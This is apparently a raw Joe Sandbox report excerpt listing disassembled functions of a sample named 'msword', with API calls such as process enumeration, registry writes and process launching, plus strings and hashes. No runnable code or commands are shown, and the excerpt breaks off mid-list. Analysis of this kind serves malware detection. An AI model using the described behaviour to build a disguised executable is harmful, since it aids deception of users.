Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Module32FirstW, xrefs: 004065D3
EnumProcessModules, xrefs: 0040648A
GetModuleBaseNameW, xrefs: 00406494
Unknown, xrefs: 004064FC
EnumProcesses, xrefs: 00406482
CreateToolhelp32Snapshot, xrefs: 004065B5
Module32NextW, xrefs: 004065DE
PSAPI.DLL, xrefs: 00406464
Kernel32.DLL, xrefs: 0040659B
Process32FirstW, xrefs: 004065BD
Process32NextW, xrefs: 004065C8

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
open, xrefs: 004042DF
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E
[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

